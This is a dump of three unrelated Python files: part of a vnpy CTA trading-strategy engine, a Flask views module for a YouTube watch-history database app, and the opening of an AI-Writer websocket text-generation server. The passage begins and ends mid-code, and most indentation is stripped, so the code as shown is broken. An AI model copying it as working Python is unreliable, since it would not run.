strategy_vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_order.stop_orderid in strategy_vt_orderids:
strategy_vt_orderids.remove(stop_order.stop_orderid)
                    # Change stop order status to triggered and update to strategy.
stop_order.status = StopOrderStatus.TRIGGERED
stop_order.vt_orderids = vt_orderids
self.call_strategy_func(
strategy, strategy.on_stop_order, stop_order
)
self.put_stop_order_event(stop_order)
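    # Note on local stop orders: check_stop_order above emulates stop orders in
    # the engine for gateways without native stop-order support. On every tick
    # it scans self.stop_orders, and once the trigger price is crossed it
    # converts the stop order into an aggressive limit order via send_limit_order.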
def send_server_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
type: OrderType,
lock: bool
):
"""
Send a new order to server.
"""
# Create request and send order.
original_req = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
offset=offset,
type=type,
price=price,
volume=volume,
)
# Convert with offset converter
req_list = self.offset_converter.convert_order_request(original_req, lock)
# Send Orders
vt_orderids = []
for req in req_list:
vt_orderid = self.main_engine.send_order(
req, contract.gateway_name)
vt_orderids.append(vt_orderid)
self.offset_converter.update_order_request(req, vt_orderid)
# Save relationship between orderid and strategy.
self.orderid_strategy_map[vt_orderid] = strategy
self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
lock
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
lock
)
def send_local_stop_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Create a new local stop order.
"""
self.stop_order_count += 1
stop_orderid = f"{STOPORDER_PREFIX}.{self.stop_order_count}"
stop_order = StopOrder(
vt_symbol=strategy.vt_symbol,
direction=direction,
offset=offset,
price=price,
volume=volume,
stop_orderid=stop_orderid,
strategy_name=strategy.strategy_name,
lock=lock
)
self.stop_orders[stop_orderid] = stop_order
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
vt_orderids.add(stop_orderid)
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
return stop_orderid
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def cancel_local_stop_order(self, strategy: CtaTemplate, stop_orderid: str):
"""
Cancel a local stop order.
"""
stop_order = self.stop_orders.get(stop_orderid, None)
if not stop_order:
return
strategy = self.strategies[stop_order.strategy_name]
# Remove from relation map.
self.stop_orders.pop(stop_orderid)
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_orderid in vt_orderids:
vt_orderids.remove(stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.CANCELLED
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool,
lock: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
if stop:
if contract.stop_supported:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume, lock)
else:
return self.send_local_stop_order(strategy, direction, offset, price, volume, lock)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume, lock)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
# Query bars from RQData by default, if not found, load from database.
bars = self.query_bar_from_rq(symbol, exchange, interval, start, end)
if not bars:
bars = database_manager.load_bar_data(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end,
)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
def add_strategy(
self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
):
"""
Add a new strategy.
"""
if strategy_name in self.strategies:
self.write_log(f"创建策略失败,存在重名{strategy_name}")
return
strategy_class = self.classes[class_name]
strategy = strategy_class(self, strategy_name, vt_symbol, setting)
self.strategies[strategy_name] = strategy
# Add vt_symbol to strategy map.
strategies = self.symbol_strategy_map[vt_symbol]
strategies.append(strategy)
# Update to setting file.
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def init_strategy(self, strategy_name: str):
"""
Init a strategy.
"""
self.init_queue.put(strategy_name)
if not self.init_thread:
self.init_thread = Thread(target=self._init_strategy)
self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
if data:
for name in strategy.variables:
value = data.get(name, None)
if value:
setattr(strategy, name, value)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
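# -----------------------------------------------------------------------------
# Illustrative sketch only (not part of the original module): how a CtaEngine is
# typically wired up. "DemoStrategy" and the strategy settings below are
# hypothetical placeholders; in practice the engine is created through the vnpy
# app framework rather than instantiated directly.
# -----------------------------------------------------------------------------
if __name__ == "__main__":
    event_engine = EventEngine()
    main_engine = MainEngine(event_engine)

    cta_engine = CtaEngine(main_engine, event_engine)
    cta_engine.init_engine()  # loads strategy classes, settings and saved data

    # Assumes a DemoStrategy class was found under a "strategies" folder.
    cta_engine.add_strategy("DemoStrategy", "demo_rb", "rb2105.SHFE", {})
    cta_engine.init_strategy("demo_rb")
    cta_engine.start_strategy("demo_rb")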
|
views.py
|
import json
import logging
import os
import sqlite3
from os.path import join
from threading import Thread
from time import sleep
from logging import handlers
from flask import (Response, Blueprint, request, redirect, make_response,
render_template, url_for, flash)
from youtubewatched import write_to_sql
from youtubewatched import youtube
from youtubewatched.config import DB_NAME
from youtubewatched.convert_takeout import get_all_records
from youtubewatched.utils.app import (get_project_dir_path_from_cookie,
flash_err, strong)
from youtubewatched.utils.gen import load_file, logging_config
from youtubewatched.utils.sql import (sqlite_connection, db_has_records,
execute_query)
record_management = Blueprint('records', __name__)
logging_verbosity_cookie = 'logging-verbosity-level'
cutoff_value_cookie = 'cutoff-value'
cutoff_denomination_cookie = 'cutoff-denomination'
takeout_dir_cookie = 'takeout-dir'
logger = logging.getLogger(__name__)
class ProjectControl:
"""
    Tracks the current project (directory) and switches the log file when the
    project changes; also sets up logging on first use.
"""
logger = None
cur_dir = None
class ThreadControl:
"""
    Used as a single point of reference for the work started by the user from
    index.html: starting/stopping it and tracking its status and current
    progress.
"""
thread = None
# either of the two functions that run processes started from
# index.html have checks placed throughout them for the state of this flag
# and will exit if it's set to True
exit_thread_flag = False
live_thread_warning = 'Wait for the current operation to finish'
active_event_stream = None
stage = None
percent = '0.0'
def is_thread_alive(self):
return self.thread and self.thread.is_alive()
def exit_thread_check(self):
if self.exit_thread_flag:
DBProcessState.stage = None
add_sse_event(event='stop')
logger.warning('Stopped the DB update thread')
return True
ProjectState = ProjectControl()
DBProcessState = ThreadControl()
progress = []
def add_sse_event(data: str = '', event: str = '', id_: str = ''):
progress.append(f'data: {data}\n'
f'event: {event}\n'
f'id: {id_}\n\n')
if event in ['errors', 'stats', 'stop']:
DBProcessState.stage = None
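# add_sse_event formats messages using the Server-Sent Events wire format
# ("data:", "event:" and "id:" fields terminated by a blank line). event_stream()
# below pops them off the `progress` list and /db_progress_stream serves them
# with the text/event-stream mimetype, so the browser can consume them with a
# standard EventSource.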
@record_management.route('/')
def index():
project_path = get_project_dir_path_from_cookie()
if not project_path:
return redirect(url_for('project.setup_project'))
elif not os.path.exists(project_path):
flash(f'{flash_err} could not find directory {strong(project_path)}')
return redirect(url_for('project.setup_project'))
if not ProjectState.logger:
ProjectState.logger = logging_config(join(project_path, 'events.log'))
# projects (directories) were changed, changing the log file accordingly
if project_path != ProjectState.cur_dir:
for i in ProjectState.logger.handlers:
if isinstance(i, handlers.RotatingFileHandler):
i.stream.close() # closing currently open file
i.stream = open(join(project_path, 'events.log'), 'a')
ProjectState.cur_dir = project_path
if DBProcessState.active_event_stream is None:
DBProcessState.active_event_stream = True
else:
# event_stream() will set this back to True after disengaging
DBProcessState.active_event_stream = False
# default values for forms, set when the user first submits a form
logging_verbosity = request.cookies.get(logging_verbosity_cookie)
takeout_dir = request.cookies.get(takeout_dir_cookie)
cutoff_time = request.cookies.get(cutoff_value_cookie)
cutoff_denomination = request.cookies.get(cutoff_denomination_cookie)
db = db_has_records()
if not request.cookies.get('description-seen'):
resp = make_response(render_template('index.html', path=project_path,
description=True, db=db))
resp.set_cookie('description-seen', 'True', max_age=31_536_000)
return resp
return render_template('index.html', path=project_path, db=db,
logging_verbosity=logging_verbosity,
takeout_dir=takeout_dir,
cutoff_time=cutoff_time,
cutoff_denomination=cutoff_denomination)
@record_management.route('/process_status')
def process_status():
if not DBProcessState.stage:
return json.dumps({'stage': 'Quiet'})
else:
return json.dumps({'stage': DBProcessState.stage,
'percent': DBProcessState.percent})
@record_management.route('/cancel_db_process', methods=['POST'])
def cancel_db_process():
DBProcessState.stage = None
DBProcessState.percent = '0.0'
if DBProcessState.thread and DBProcessState.thread.is_alive():
DBProcessState.exit_thread_flag = True
while True:
if DBProcessState.is_thread_alive():
sleep(0.5)
else:
DBProcessState.exit_thread_flag = False
break
return 'Process stopped'
def event_stream():
while True:
if progress:
yield progress.pop(0)
else:
if DBProcessState.active_event_stream:
sleep(0.05)
else:
break
# allow SSE for potential subsequent DB processes
DBProcessState.active_event_stream = True
progress.clear()
@record_management.route('/db_progress_stream')
def db_progress_stream():
return Response(event_stream(), mimetype="text/event-stream")
@record_management.route('/start_db_process', methods=['POST'])
def start_db_process():
resp = make_response('')
if DBProcessState.is_thread_alive():
return DBProcessState.live_thread_warning
logging_verbosity = request.form.get('logging-verbosity-level')
resp.set_cookie(logging_verbosity_cookie, logging_verbosity,
max_age=31_536_000)
logging_verbosity = int(logging_verbosity)
takeout_path = request.form.get('takeout-dir')
project_path = get_project_dir_path_from_cookie()
if takeout_path:
takeout_dir = os.path.expanduser(takeout_path.strip())
if os.path.exists(takeout_dir):
resp.set_cookie(takeout_dir_cookie, takeout_dir, max_age=31_536_000)
args = (takeout_dir, project_path, logging_verbosity)
target = populate_db
else:
cutoff_time = request.form.get('update-cutoff')
cutoff_denomination = request.form.get('update-cutoff-denomination')
resp.set_cookie(cutoff_value_cookie, cutoff_time, max_age=31_536_000)
resp.set_cookie(cutoff_denomination_cookie, cutoff_denomination,
max_age=31_536_000)
cutoff = int(cutoff_time) * int(cutoff_denomination)
args = (project_path, cutoff, logging_verbosity)
target = update_db
DBProcessState.thread = Thread(target=target, args=args)
DBProcessState.thread.start()
return resp
def _show_front_end_data(fe_data: dict, conn):
"""
Composes a basic summary shown at the end of adding Takeout or updating
records
"""
fe_data['records_in_db'] = execute_query(
conn, 'SELECT count(*) from videos')[0][0]
fe_data['timestamps'] = execute_query(
conn, 'SELECT count(*) from videos_timestamps')[0][0]
at_start = fe_data.get('at_start', None)
if at_start is not None:
fe_data['inserted'] = fe_data['records_in_db'] - at_start
if DBProcessState.stage:
add_sse_event(event='stop')
add_sse_event(json.dumps(fe_data), 'stats')
def populate_db(takeout_path: str, project_path: str, logging_verbosity: int):
if DBProcessState.exit_thread_check():
return
progress.clear()
DBProcessState.percent = '0'
DBProcessState.stage = 'Processing watch-history.html file(s)...'
add_sse_event(DBProcessState.stage, 'stage')
records = {}
try:
for f in get_all_records(takeout_path, project_path):
if DBProcessState.exit_thread_check():
return
if isinstance(f, tuple):
DBProcessState.percent = f'{f[0]} {f[1]}'
add_sse_event(DBProcessState.percent, 'takeout_progress')
else:
try:
records = f['videos']
if len(records) == 1: # 1 because of the empty unknown rec
add_sse_event('No records found in the provided '
'watch-history.html file(s). '
'Something is very wrong.', 'errors')
return
except KeyError:
add_sse_event(f'No watch-history.html files found in '
f'{takeout_path!r}', 'errors')
return
failed_entries = f['failed_entries']
if failed_entries:
add_sse_event(f'Couldn\'t parse {len(failed_entries)} '
f'entries; dumped to parse_fails.json '
f'in project directory', 'warnings')
failed_files = f['failed_files']
if failed_files:
add_sse_event('The following files could not be '
'processed:', 'warnings')
for ff in failed_files:
add_sse_event(ff, 'warnings')
total_ts = f['total_timestamps']
total_v = f['total_videos']
add_sse_event(f'Videos / timestamps found: '
f'{total_v} / {total_ts}', 'info')
except FileNotFoundError:
add_sse_event(f'Invalid/non-existent path for watch-history.html files',
'errors')
raise
if DBProcessState.exit_thread_check():
return
db_path = join(project_path, DB_NAME)
conn = sqlite_connection(db_path, types=True)
front_end_data = {'updated': 0}
try:
api_auth = youtube.get_api_auth(
load_file(join(project_path, 'api_key')).strip())
write_to_sql.setup_tables(conn, api_auth)
records_at_start = execute_query(
conn, 'SELECT count(*) from videos')[0][0]
if not records_at_start:
front_end_data['at_start'] = 0
else:
front_end_data['at_start'] = records_at_start
DBProcessState.percent = '0.0'
add_sse_event(f'{DBProcessState.percent} 1')
DBProcessState.stage = ('Inserting video records/timestamps from '
'Takeout...')
add_sse_event(DBProcessState.stage, 'stage')
for record in write_to_sql.insert_videos(
conn, records, api_auth, logging_verbosity):
if DBProcessState.exit_thread_check():
break
DBProcessState.percent = str(record[0])
add_sse_event(f'{DBProcessState.percent} {record[1]}')
front_end_data['updated'] = record[2]
_show_front_end_data(front_end_data, conn)
if DBProcessState.stage:
add_sse_event(event='stop')
add_sse_event(json.dumps(front_end_data), 'stats')
conn.close()
except youtube.ApiKeyError:
add_sse_event(f'Missing or invalid API key', 'errors')
raise
except youtube.ApiQuotaError:
add_sse_event(f'API quota/rate limit exceeded, see '
f'<a href="https://console.developers.google.com/apis/'
f'api/youtube.googleapis.com/overview" target="_blank">'
f'here</a>', 'errors')
raise
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
add_sse_event(f'Fatal database error - {e!r}', 'errors')
raise
except FileNotFoundError:
add_sse_event(f'Invalid database path', 'errors')
raise
conn.close()
def update_db(project_path: str, cutoff: int, logging_verbosity: int):
import sqlite3
progress.clear()
DBProcessState.percent = '0.0'
DBProcessState.stage = 'Updating...'
add_sse_event(DBProcessState.stage, 'stage')
db_path = join(project_path, DB_NAME)
conn = sqlite_connection(db_path)
front_end_data = {'updated': 0,
'failed_api_requests': 0,
'newly_inactive': 0,
'records_in_db': execute_query(
conn,
'SELECT count(*) from videos')[0][0]}
try:
api_auth = youtube.get_api_auth(
load_file(join(project_path, 'api_key')).strip())
if DBProcessState.exit_thread_check():
return
for record in write_to_sql.update_videos(conn, api_auth, cutoff,
logging_verbosity):
if DBProcessState.exit_thread_check():
break
DBProcessState.percent = str(record[0])
add_sse_event(f'{DBProcessState.percent} {record[1]}')
front_end_data['updated'] = record[2]
front_end_data['newly_inactive'] = record[3]
front_end_data['newly_active'] = record[4]
front_end_data['deleted'] = record[5]
_show_front_end_data(front_end_data, conn)
except youtube.ApiKeyError:
add_sse_event(f'{flash_err} Missing or invalid API key', 'errors')
raise
except youtube.ApiQuotaError:
add_sse_event(f'API quota/rate limit exceeded, see '
f'<a href="https://console.developers.google.com/apis/'
f'api/youtube.googleapis.com/overview" target="_blank">'
f'here</a>', 'errors')
raise
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
add_sse_event(f'{flash_err} Fatal database error - {e!r}', 'errors')
raise
except FileNotFoundError:
add_sse_event(f'{flash_err} Invalid database path', 'errors')
raise
conn.close()
|
server.py
|
########################################################################################################
# AI-Writer (AI人工智障写作) - https://github.com/BlinkDL/AI-Writer
########################################################################################################
import math
import json
import random
import time
_DEBUG_LEVEL_ = 2 # 2 = full, 1 = partial, 0 = none
PORT_NUM = 8266
#
# Requires PyTorch 1.9.x or later
#
# gpu: NVIDIA GPUs only, fastest; requires CUDA + cuDNN
# dml: supports AMD / Intel / NVIDIA GPUs; needs a different model, `pip install onnxruntime-directml`, and dml mode set in run.py and server.py
# cpu: pick this if you have no GPU; it still uses the NVIDIA-card model
RUN_DEVICE = 'gpu'  # 'gpu', 'dml' or 'cpu'
MODEL_NAME = 'model/xuanhuan-2021-10-26'  # model name, e.g. yanqing-2021-10-29 or xuanhuan-2021-10-26
WORD_NAME = 'model/xuanhuan-2021-10-26'  # change this to match MODEL_NAME
min_p_ratio = 0.02  # range 0 to 1: larger values give tamer output, smaller values give more variety; try 0, 0.1 and 1.0 to compare
LENGTH_OF_EACH = 20  # number of characters generated per request
ctx_len = 512
n_layer = 12
n_head = 12
n_embd = n_head * 64
n_attn = n_embd
n_ffn = n_embd
##############################################################################
def main():
import sys
import signal
from multiprocessing import Process, RawArray, freeze_support, Queue, Lock
freeze_support()
queueZ = Queue()
queueX = Queue()
process = []
process.append(Process(target=SocketWorker, args=(queueX, queueZ)))
process.append(Process(target=NeuralWorker, args=(queueZ, queueX)))
for p in process:
p.daemon = True
p.start()
def signal_handler(signal, frame):
for p in process:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
for p in process:
p.join()
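# Process layout (summary of main() above): SocketWorker owns the websocket
# server and NeuralWorker owns the model. queueZ carries (client_id, prompt)
# requests from the socket process to the neural process; queueX carries
# (client_id, generated-text JSON) responses back for delivery to the matching
# websocket client.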
def SocketWorker(queueX, queueZ):
import asyncio
import websockets
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
USERS = set()
async def producer():
hasData = False
try:
K, out = queueX.get(timeout=0.05)
hasData = True
except:
pass
if hasData:
return (K, out)
else:
await asyncio.sleep(0.001)
if random.random() < -0.003:
return '[PING]'
else:
return ''
async def producer_handler(websocket, path):
while True:
msg = await producer()
if isinstance(msg, tuple):
K, msg = msg
for x in USERS:
if x.client_id == K:
# if _DEBUG_LEVEL_ > 0:
# print('sent X', K)
await x.send(msg)
break
elif msg != '':
await websocket.send(msg)
async def consumer(websocket, msg):
if msg == '[PONG]':
return
try:
msg = json.loads(msg)
if msg['op'].lower() == 'get':
# if _DEBUG_LEVEL_ > 0:
# print('get', websocket.client_id, msg['txt'])
queueZ.put((websocket.client_id, msg['txt']))
except Exception as e:
print(e)
pass
async def consumer_handler(websocket, path):
while True:
msg = await websocket.recv()
await consumer(websocket, msg)
async def server(websocket, path):
websocket.client_id = '%020x' % random.randrange(16**20)
USERS.add(websocket)
print("[ws connect]", len(USERS), 'users @',
time.strftime("%Y %b %d %H:%M:%S", time.localtime(time.time())))
try:
await websocket.send('id_' + websocket.client_id)
consumer_task = asyncio.ensure_future(
consumer_handler(websocket, path))
producer_task = asyncio.ensure_future(
producer_handler(websocket, path))
done, pending = await asyncio.wait(
[consumer_task, producer_task],
return_when=asyncio.FIRST_COMPLETED)
for task in pending:
task.cancel()
finally:
USERS.remove(websocket)
print("[ws disconnect]", len(USERS))
def srv_exception(loop, context):
if _DEBUG_LEVEL_ > 1:
print('exception', loop, context)
pass
try:
start_server = websockets.serve(server, "127.0.0.1", PORT_NUM)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().set_exception_handler(srv_exception)
asyncio.get_event_loop().run_forever()
except Exception as e:
print('[srv error]', e)
def NeuralWorker(queueZ, queueX):
from multiprocessing import Process, RawArray, freeze_support, Queue, Lock
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
import src.utils
from src.model import GPT, GPTConfig
    # src.utils.set_seed(42)  # whether to fix the random seed (if fixed, every run produces the same output)
    print('\nAI-Writer (AI人工智障写作) https://github.com/BlinkDL/AI-Writer')
    print('Follow the author on Zhihu: https://zhuanlan.zhihu.com/p/394766831')
    print('\nDisclaimer: the model was trained entirely on web novels and lacks real-world common sense. Generated text is for entertainment only. Please comply with applicable laws and regulations.')
print(f'\nLoading model for {RUN_DEVICE}...', end=' ')
with open(WORD_NAME + '.json', "r", encoding="utf-16") as result_file:
word_table = json.load(result_file)
vocab_size = len(word_table)
def train_dataset(): return None
train_dataset.stoi = {v: int(k) for k, v in word_table.items()}
train_dataset.itos = {int(k): v for k, v in word_table.items()}
UNKNOWN_CHAR = train_dataset.stoi['\ue083']
if RUN_DEVICE == 'dml':
import onnxruntime as rt
sess_options = rt.SessionOptions()
sess_options.graph_optimization_level = rt.GraphOptimizationLevel.ORT_ENABLE_ALL
sess_options.execution_mode = rt.ExecutionMode.ORT_SEQUENTIAL
sess_options.enable_mem_pattern = False
rt_session = rt.InferenceSession(MODEL_NAME + '.onnx', sess_options=sess_options, providers=['DmlExecutionProvider'])
rt_session.set_providers(['DmlExecutionProvider'])
else:
model = GPT(GPTConfig(vocab_size, ctx_len, n_layer=n_layer, n_head=n_head, n_embd=n_embd, n_attn=n_attn, n_ffn=n_ffn))
m2 = torch.load(MODEL_NAME + '.pth', map_location='cpu').state_dict()
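        # The checkpoint stores separate time_w / time_alpha / time_beta / mask
        # tensors per attention block; the loop below pre-combines them into a
        # single masked 'time_ww' tensor so this work is done once at load time
        # rather than on every forward pass.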
for i in range(n_layer):
prefix = f'blocks.{i}.attn.'
time_w = m2[prefix + 'time_w']
time_alpha = m2[prefix + 'time_alpha']
time_beta = m2[prefix + 'time_beta']
mask = m2[prefix + 'mask']
TT = ctx_len
T = ctx_len
w = F.pad(time_w, (0, TT))
w = torch.tile(w, [TT])
w = w[:, :-TT].reshape(-1, TT, 2 * TT - 1)
w = w[:, :, TT-1:]
w = w[:, :T, :T] * time_alpha[:, :, :T] * time_beta[:, :T, :]
w = w.masked_fill(mask[:T, :T] == 0, 0)
m2[prefix + 'time_ww'] = w
del m2[prefix + 'time_w']
del m2[prefix + 'time_alpha']
del m2[prefix + 'time_beta']
del m2[prefix + 'mask']
if RUN_DEVICE == 'gpu':
model = model.cuda()
model.load_state_dict(m2)
print('done:', MODEL_NAME, '&', WORD_NAME)
while True:
K, Z = queueZ.get()
# print('neural task', K, Z)
ttt = time.time()
context = Z
context = context.strip().split('\n')
for c in range(len(context)):
context[c] = context[c].strip().strip('\u3000').strip('\r')
context = list(filter(lambda c: c != '', context))
context = '\n' + ('\n'.join(context)).strip()
        # print('Your prompt contains ' + str(len(context)) +
        #       ' characters. Note the model only looks at the last ' + str(ctx_len) + ' characters.')
NUM_OF_RUNS = 1
for run in range(NUM_OF_RUNS):
x = np.array([train_dataset.stoi.get(s, UNKNOWN_CHAR)
for s in context], dtype=np.int64)
real_len = len(x)
